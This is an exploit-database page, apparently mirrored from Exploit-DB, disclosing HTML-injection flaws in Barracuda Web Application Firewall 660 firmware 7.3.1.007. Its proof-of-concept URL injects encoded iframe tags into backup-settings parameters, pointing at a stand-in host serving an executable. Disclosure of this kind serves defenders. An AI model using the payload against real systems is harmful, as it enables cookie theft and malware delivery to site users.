header-logo
Suggest Exploit
vendor:
Web Application Firewall 660
by:
SecurityFocus
7.5
CVSS
HIGH
HTML-injection
79
CWE
Product Name: Web Application Firewall 660
Affected Version From: 7.3.1.007
Affected Version To: 7.3.1.007
Patch Exists: YES
Related CWE: N/A
CPE: h:barracuda:web_application_firewall_660
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Barracuda Web Application Firewall 660 HTML-injection Vulnerabilities

The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities. Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37432/info

The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.

http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US

Navigation

Suggest Exploit

Services By CQR